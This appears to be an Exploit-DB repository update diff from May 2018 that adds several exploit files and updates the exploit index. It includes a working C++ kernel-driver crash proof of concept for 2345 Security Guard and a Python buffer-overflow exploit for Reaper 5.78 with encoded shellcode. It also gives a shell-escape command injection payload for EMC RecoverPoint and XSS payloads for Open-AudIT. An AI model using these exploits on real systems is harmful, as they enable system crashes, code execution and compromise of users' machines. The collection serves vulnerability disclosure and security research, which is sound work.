DB: 2018-05-12

6 changes to exploits/shellcodes

2345 Security Guard 3.7 - Denial of Service
2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service

2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service

Reaper 5.78 - Local Buffer Overflow

EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection

Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)
Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)

Open-AudIT Professional - 2.1.1 - Cross-Site Scripting

Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC
Ncomputing vSpace Pro 10/11 - Directory Traversal

Fastweb FASTGate 0.00.47 - Cross-site Request Forgery
Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery

Open-AudIT Community - 2.2.0 – Cross-Site Scripting

exploits/php/webapps/44416.txt

@@ -1,10 +1,10 @@
-# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery]
-# Date: [2018-03-07]
-# Exploit Author: [ppb（ppb@5ecurity.cn）]
-# Vendor Homepage: [https://github.com/cobub/razor/]
-# Software Link: [https://github.com/cobub/razor/]
-# Version: [0.72] 
-# CVE : [CVE-2018-7746]
+# Exploit Title: Cobub Razor 0.7.2 Cross Site Request Forgery
+# Date: 2018-03-07
+# Exploit Author: ppb
+# Vendor Homepage: https://github.com/cobub/razor/
+# Software Link: https://github.com/cobub/razor/
+# Version: 0.72
+# CVE : CVE-2018-7746
 
 There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
 

exploits/windows/dos/44615.cpp

@@ -0,0 +1,332 @@
+# Exploit Title: [BSOD  by IOCTL 0x002220e0 in 2345BdPcSafe.sys  of 2345 Security Guard 3.7]
+# Date: [20180509]
+# Exploit Author: [anhkgg]
+# Vendor Homepage: [http://safe.2345.cc/]
+# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
+# Version: [v3.7] (REQUIRED)
+# Tested on: [Windows X64]
+# CVE : [CVE-2018- 10830]
+
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+
+struct NETFW_IOCTL_ADD_PID
+{
+	DWORD pid;
+	char seed[0x14];//4 + 14
+};//0x18
+
+#pragma pack(push)
+#pragma pack(1)
+struct NETFW_IOCTL_SET_PID
+{
+	BYTE set_state;//
+	WORD buf_len;//1
+	DWORD pid;//3
+	char buf[0x64];//7
+};//6B
+#pragma pack(pop)
+
+int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
+{
+	BYTE *a1_; // eax
+
+	a1_ = a1;
+	*a1_ ^= *a2;
+	*a2 ^= *a1;
+	*a1_ ^= *a2;
+	return (int)a1_;
+}
+
+int __stdcall sub_12A80(char *a1, int len, char *a3)
+{
+	int result;
+	unsigned __int8 v4;
+	__int16 i;
+	__int16 j;
+	unsigned __int8 k;
+
+	for (i = 0; i < 256; ++i)
+		a3[i] = i;
+	a3[256] = 0;
+	a3[257] = 0;
+	k = 0;
+	v4 = 0;
+	result = 0;
+	for (j = 0; j < 256; ++j)
+	{
+		v4 += a3[j] + a1[k];
+		f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
+		result = (k + 1) / len;
+		k = (k + 1) % len;
+	}
+	return result;
+}
+
+char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
+{
+	char *v3; // esi
+	unsigned int v4; // ebx
+	unsigned __int8 result; // al
+	int v6; // edi
+	char *v7; // ST18_4
+	int v8; // [esp+14h] [ebp-8h]
+	int v9; // [esp+18h] [ebp-4h]
+	unsigned __int8 v10; // [esp+2Fh] [ebp+13h]
+
+	v3 = a3;
+	v4 = a3[256];
+	result = a3[257];
+	v9 = 0;
+	if (len > 0)
+	{
+		v6 = (unsigned __int8)v4;
+		v8 = 0;
+		while (1)
+		{
+			v4 = (v6 + 1) & 0x800000FF;
+			v6 = (unsigned __int8)v4;
+			v10 = v3[(unsigned __int8)v4] + result;
+			v7 = &v3[v10];
+			f_XOR__12A30((BYTE*)&v3[(unsigned __int8)v4], (BYTE*)v7);
+			a1[v8] ^= v3[(unsigned __int8)(v3[(unsigned __int8)v4] + *v7)];
+			v8 = (signed __int16)++v9;
+			if ((signed __int16)v9 >= len)
+				break;
+			result = v10;
+		}
+		result = v10;
+	}
+	v3[256] = v4;
+	v3[257] = result;
+	return (char *)result;
+}
+
+void calc_seed(char* seed, char* dst)
+{
+	char Source1[26] = { 0 };
+	char a3[300] = { 0 };
+
+	Source1[0] = 8;
+	Source1[1] = 14;
+	Source1[2] = 8;
+	Source1[3] = 10;
+	Source1[4] = 2;
+	Source1[5] = 3;
+	Source1[6] = 29;
+	Source1[7] = 23;
+	Source1[8] = 13;
+	Source1[9] = 3;
+	Source1[10] = 15;
+	Source1[11] = 22;
+	Source1[12] = 15;
+	Source1[13] = 7;
+	Source1[14] = 91;
+	Source1[15] = 4;
+	Source1[16] = 18;
+	Source1[17] = 26;
+	Source1[18] = 26;
+	Source1[19] = 3;
+	Source1[20] = 4;
+	Source1[21] = 1;
+	Source1[22] = 15;
+	Source1[23] = 25;
+	Source1[24] = 10;
+	Source1[25] = 13;
+
+	sub_12A80(seed, 0x14, a3);       
+	sub_12B60(Source1, 0x1A, a3);
+	memcpy(dst, Source1, 26);
+}
+
+BOOL BypassChk(HANDLE h)
+{
+	DWORD BytesReturned = 0;
+
+	DWORD ctlcode = 0x222090;
+	NETFW_IOCTL_ADD_PID add_pid = { 0 };
+	add_pid.pid = GetCurrentProcessId();
+
+	if (!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
+		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
+		return FALSE;
+	}
+
+	ctlcode = 0x222094;
+	NETFW_IOCTL_SET_PID set_pid = { 0 };
+	set_pid.pid = GetCurrentProcessId();
+	set_pid.set_state = 1;
+
+	calc_seed(add_pid.seed, set_pid.buf);
+	set_pid.buf_len = 26;
+
+	if (!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
+		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+HANDLE OpenDevice(char* path)
+{
+	return CreateFileA(path,
+		GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
+		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+}
+
+CHAR asciiString10[0x10];
+CHAR asciiString100[0x100];
+CHAR asciiString1000[0x1000];
+WCHAR unicodeString10[0x10];
+WCHAR unicodeString100[0x100];
+WCHAR unicodeString1000[0x1000];
+DWORD tableDwords[0x100];
+
+DWORD FuzzConstants[] = {
+	0x00000000, 0x00000001, 0x00000004, 0xFFFFFFFF,
+	0x00001000, 0xFFFF0000, 0xFFFFFFFE, 0xFFFFFFF0,
+	0xFFFFFFFC, 0x70000000, 0x7FFEFFFF, 0x7FFFFFFF,
+	0x80000000,
+	(DWORD)asciiString10,
+	(DWORD)asciiString100,
+	(DWORD)asciiString1000,
+	(DWORD)unicodeString10,
+	(DWORD)unicodeString100,
+	(DWORD)unicodeString1000,
+	(DWORD)tableDwords
+};
+
+/* Period parameters */
+#define N 624
+#define M 397
+#define MATRIX_A 0x9908b0dfUL   /* constant vector a */
+#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
+#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
+
+static unsigned long mt[N]; /* the array for the state vector  */
+static int mti = N + 1; /* mti==N+1 means mt[N] is not initialized */
+
+/* initializes mt[N] with a seed */
+void init_genrand(unsigned long s)
+{
+	mt[0] = s & 0xffffffffUL;
+	for (mti = 1; mti < N; mti++) {
+		mt[mti] =
+			(1812433253UL * (mt[mti - 1] ^ (mt[mti - 1] >> 30)) + mti);
+		/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
+		/* In the previous versions, MSBs of the seed affect   */
+		/* only MSBs of the array mt[].                        */
+		/* 2002/01/09 modified by Makoto Matsumoto             */
+		mt[mti] &= 0xffffffffUL;
+		/* for >32 bit machines */
+	}
+}
+
+/* generates a random number on [0,0xffffffff]-interval */
+unsigned long genrand_int32(void)
+{
+	unsigned long y;
+	static unsigned long mag01[2] = { 0x0UL, MATRIX_A };
+	/* mag01[x] = x * MATRIX_A  for x=0,1 */
+
+	if (mti >= N) { /* generate N words at one time */
+		int kk;
+
+		if (mti == N + 1)   /* if init_genrand() has not been called, */
+			init_genrand(5489UL); /* a default initial seed is used */
+
+		for (kk = 0; kk < N - M; kk++) {
+			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
+			mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1UL];
+		}
+		for (; kk < N - 1; kk++) {
+			y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
+			mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
+		}
+		y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK);
+		mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1UL];
+
+		mti = 0;
+	}
+
+	y = mt[mti++];
+
+	/* Tempering */
+	y ^= (y >> 11);
+	y ^= (y << 7) & 0x9d2c5680UL;
+	y ^= (y << 15) & 0xefc60000UL;
+	y ^= (y >> 18);
+
+	return y;
+}
+
+unsigned long getrand(unsigned long min, unsigned long max)
+{
+	return (genrand_int32() % (max - min + 1)) + min;
+}
+
+//3.7.0.2860
+int poc_2345NetFirewall()
+{
+	
+	DWORD BytesReturned = 0;
+
+	HANDLE h = OpenDevice("\\\\.\\2345BdPcSafe");
+	if (h == INVALID_HANDLE_VALUE) {
+		printf("[-] Open device error: %d\n", GetLastError());
+		return 1;
+	}
+
+	if (!BypassChk(h)) {
+		printf("[-] error!");
+		return 1;
+	}
+
+	DWORD ctlcode = 0x002220e0;
+	BYTE  bufInput[0x10000] = { 0 };
+	BYTE  bufOutput[0x10000] = { 0 };
+
+	srand(time(NULL));
+	int count = 0;
+	while (count++ < 1000) {
+		// Choose a random length for the buffer
+		size_t randomLength = getrand(4, 0x400);
+
+		for (int i = 0; i < randomLength; i = i + 4) {
+			int fuzzData = FuzzConstants[getrand(0, (sizeof(FuzzConstants) / 4) - 1)];
+
+			// Choose a random element into FuzzConstants
+			bufInput[i] = fuzzData & 0x000000ff;
+			bufInput[i + 1] = (fuzzData & 0x0000ff00) >> 8;
+			bufInput[i + 2] = (fuzzData & 0x00ff0000) >> 16;
+			bufInput[i + 3] = (fuzzData & 0xff000000) >> 24;
+		}
+
+		DeviceIoControl(h,
+			ctlcode,
+			bufInput,
+			randomLength,
+			bufOutput,
+			0,
+			&BytesReturned,
+			NULL);
+
+		Sleep(10);
+	}
+
+	return 0;
+}
+
+int main()
+{
+	poc_2345NetFirewall();
+
+	printf("poc failed!\n");
+
+	getchar();
+		
+	return 0;
+}

exploits/windows/local/44477.py

@@ -0,0 +1,73 @@
+# Exploit Title: Reaper 5.78 - Local Buffer Overflow
+# Exploit Author: bzyo
+# CVE: CVE-2018-9131
+# Date: 2018-03-30
+# Vulnerable Software: Reaper 5.78
+# Vendor Homepage: https://www.reaper.fm/
+# Version: 5.78
+# Software Link: https://www.reaper.fm/download.php
+# Tested On: Windows 7 x86
+#
+# lots of bad chars, use alpha_mixed with register
+# bad chars \x00\x0a\x0d and everything above \x80
+#
+# PoC: 
+# 1. generate reaper578.txt, copy contents to clipboard
+# 2. open app, select Options, select Preferences
+# 3. choose ReaScript
+# 4. paste reaper578.txt contents into both fields:
+#    'Custom path to Python dll directory'
+#    'Force ReaScript to use specific Python dll'
+# 5. pop calc
+#
+
+import struct
+
+filename="reaper578.txt"
+
+junk = "A"*95
+
+#0x10042e5a : push esp # ret  | ascii {PAGE_EXECUTE_READ} [elastique.dll]
+eip = struct.pack('<I',0x10042e5a)
+
+#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
+#Payload size: 440 bytes
+calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6d\x52\x35\x50"
+"\x35\x50\x65\x50\x75\x30\x6b\x39\x6a\x45\x70\x31\x4f\x30\x65"
+"\x34\x4c\x4b\x56\x30\x76\x50\x4c\x4b\x46\x32\x56\x6c\x6e\x6b"
+"\x73\x62\x55\x44\x4c\x4b\x71\x62\x51\x38\x36\x6f\x4f\x47\x53"
+"\x7a\x56\x46\x66\x51\x49\x6f\x4e\x4c\x67\x4c\x55\x31\x63\x4c"
+"\x57\x72\x54\x6c\x57\x50\x79\x51\x4a\x6f\x64\x4d\x67\x71\x49"
+"\x57\x4a\x42\x48\x72\x71\x42\x52\x77\x4c\x4b\x52\x72\x46\x70"
+"\x4e\x6b\x71\x5a\x47\x4c\x6c\x4b\x30\x4c\x42\x31\x34\x38\x69"
+"\x73\x37\x38\x77\x71\x5a\x71\x32\x71\x4c\x4b\x62\x79\x35\x70"
+"\x75\x51\x39\x43\x6e\x6b\x71\x59\x32\x38\x4d\x33\x45\x6a\x61"
+"\x59\x4c\x4b\x74\x74\x6c\x4b\x43\x31\x4b\x66\x75\x61\x59\x6f"
+"\x4c\x6c\x6b\x71\x48\x4f\x46\x6d\x36\x61\x6f\x37\x34\x78\x69"
+"\x70\x71\x65\x69\x66\x77\x73\x33\x4d\x58\x78\x77\x4b\x61\x6d"
+"\x35\x74\x62\x55\x58\x64\x71\x48\x6e\x6b\x33\x68\x66\x44\x63"
+"\x31\x6a\x73\x55\x36\x4c\x4b\x36\x6c\x70\x4b\x6e\x6b\x51\x48"
+"\x35\x4c\x65\x51\x7a\x73\x6e\x6b\x44\x44\x6e\x6b\x57\x71\x38"
+"\x50\x6d\x59\x53\x74\x56\x44\x75\x74\x43\x6b\x33\x6b\x43\x51"
+"\x63\x69\x32\x7a\x36\x31\x49\x6f\x69\x70\x53\x6f\x43\x6f\x63"
+"\x6a\x6e\x6b\x56\x72\x6a\x4b\x6c\x4d\x73\x6d\x52\x4a\x46\x61"
+"\x4c\x4d\x4e\x65\x6e\x52\x35\x50\x63\x30\x75\x50\x70\x50\x45"
+"\x38\x54\x71\x6c\x4b\x72\x4f\x4f\x77\x4b\x4f\x39\x45\x4d\x6b"
+"\x6c\x30\x6d\x65\x4d\x72\x52\x76\x72\x48\x4f\x56\x4f\x65\x6d"
+"\x6d\x6d\x4d\x4b\x4f\x38\x55\x47\x4c\x43\x36\x43\x4c\x46\x6a"
+"\x6d\x50\x49\x6b\x4d\x30\x63\x45\x67\x75\x4f\x4b\x67\x37\x66"
+"\x73\x70\x72\x70\x6f\x32\x4a\x33\x30\x72\x73\x69\x6f\x58\x55"
+"\x33\x53\x50\x61\x50\x6c\x52\x43\x46\x4e\x52\x45\x33\x48\x70"
+"\x65\x37\x70\x41\x41")
+
+#lol 1337
+fill = "D"*(1337 - len(calc))
+
+buffer = junk + eip + calc + fill
+  
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()

exploits/windows/local/44614.txt

@@ -0,0 +1,27 @@
+# Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection
+# Version: RecoverPoint prior to 5.1.1 RecoverPoint for VMs prior to 5.0.1.3
+# Date: 2018-05-11
+# Exploit Author: Paul Taylor
+# Github: https://github.com/bao7uo
+# Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1
+# CVE: CVE-2018-1185
+ 
+1. Description
+
+An OS command injection vulnerability resulting in code execution as the built-in admin user. 
+
+A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.
+ 
+2. Proof of Concept
+
+RecoverPoint> test_snmp
+Enter the trap destination (host name or IP)
+ > /dev/null 2>&1 ; bash #
+admin@RecoverPoint:/home/kos/cli$ exit
+exit
+Test completed successfully.
+RecoverPoint> 
+
+3. Solution:
+    
+Update to latest version of RecoverPoint

exploits/windows/webapps/44612.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Open-AudIT Professional 2.1.1 – Multiple Cross-Site Scripting 
+# Exploit Author: Tejesh Kolisetty
+# Vendor Homepage: https://opmantek.com/
+# Software Link: https://opmantek.com/network-tools-download/
+# Affected Version: 2.1.1
+# Category: WebApps
+# Tested on: Win7 Professional
+# CVE : CVE-2018-9155
+
+# 1. Vendor Description:
+# Network Discovery and Inventory Software | Open-AudIT | Opmantek
+# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.
+
+# 2. Technical Description:
+# Cross-site scripting (XSS) vulnerability found in Multiple instances of
+Open-AudIT Professional - 2.1.1 that allows remote attackers to inject
+arbitrary web script or HTML, as demonstrated in below POC.
+
+# 3. Proof of Concept:
+# a) Login as user who is having Attributes Creation role
+# b) Navigate to Manage -> Attributes -> Create Attributes
+# c) Now fill the form with XSS payload in ‘Name’ field and submit payload: <script>alert('XSS')</script>
+# d) Once the data is saved, the script get executed.
+
+# Multiple Instances:
+Admin -> Logs -> View System Logs
+Manage -> Attributes -> Create Attributes
+Manage -> Users -> Create Users
+
+# 4. Solution:
+# Clone with below Gits:
+# https://github.com/Opmantek/open-audit/commit/aab685484446126a58a49b994ba5dfae6e92f4db#diff-e6d7b17fe09e809cb98cdf38b7f12638
+# https://github.com/Opmantek/open-audit/commit/755a9af8895a9e28fac82d8add7012f77bb9a8d2
+# Or Upgrade to latest release Open-AudIT Professional
+# https://opmantek.com/network-tools-download/

exploits/windows/webapps/44613.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Open-AudIT Community - 2.2.0 – Cross-Site Scripting
+# Exploit Author: Tejesh Kolisetty     #
+# Vendor Homepage: https://opmantek.com/
+# Software Link: https://opmantek.com/network-tools-download/
+# Affected Version: 2.2.0
+# Category: WebApps
+# Tested on: Win7 Professional
+# CVE : CVE-2018-10314
+
+# 1. Vendor Description:
+# Network Discovery and Inventory Software | Open-AudIT | Opmantek
+# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.
+
+# 2. Technical Description:
+# Cross-site scripting (XSS) vulnerability found in Multiple instances of Open-AudIT Community - 2.2.0 that allows remote attackers to inject arbitrary web script or HTML, as demonstrated in below POC.
+
+# 3. Proof of Concept:
+# a) Login as user who is having access to download scripts
+# b) Navigate to Discover -> Audit Scripts -> List Scripts -> Download
+# c) Now click Download any script
+# d) Now capture the request using the Burp suit tool and append below payload to ‘action’ variable payload: =download"><script>alert(‘XSS’)</script>
+# e) Then the script is executed on the browser and shows the popup.
+
+# Multiple Instances:
+Discover -> Audit Scripts -> List Scripts -> Download
+Admin -> Logs -> View System Logs
+Admin -> Logs -> View Access Logs
+etc.,.
+
+# 4. Solution:     
+# Upgrade to latest release Open-AudIT 2.2.1
+# http://dl-openaudit.opmantek.com/OAE-Win-x86_64-release_2.2.1.exe

files_exploits.csv

@@ -5966,9 +5966,10 @@ id,file,description,date,author,type,platform,port
 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
 44579,exploits/linux/dos/44579.c,"Linux Kernel  < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
-44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
+44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
+44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9692,6 +9693,7 @@ id,file,description,date,author,type,platform,port
 44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
 44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows,
 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows,
+44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows,
 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
@@ -9708,6 +9710,7 @@ id,file,description,date,author,type,platform,port
 44590,exploits/windows/local/44590.txt,"DeviceLock Plug and Play Auditor 5.72 - Unicode Buffer Overflow (SEH)",2018-05-06,hyp3rlinx,local,windows,
 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
 44603,exploits/windows/local/44603.txt,"FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
+44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16481,7 +16484,7 @@ id,file,description,date,author,type,platform,port
 44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
-44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
+44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39218,6 +39221,7 @@ id,file,description,date,author,type,platform,port
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44612,exploits/windows/webapps/44612.txt,"Open-AudIT Professional - 2.1.1 - Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
 44417,exploits/php/webapps/44417.txt,"Wordpress Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
@@ -39257,7 +39261,7 @@ id,file,description,date,author,type,platform,port
 44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
 44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php,
 44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php,
-44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC",2018-04-23,"Javier Bernardo",webapps,windows,
+44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro 10/11 - Directory Traversal",2018-04-23,"Javier Bernardo",webapps,windows,
 44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
 44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
 44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,
@@ -39294,6 +39298,7 @@ id,file,description,date,author,type,platform,port
 44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
 44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
 44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
-44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
+44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
 44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
 44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
+44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,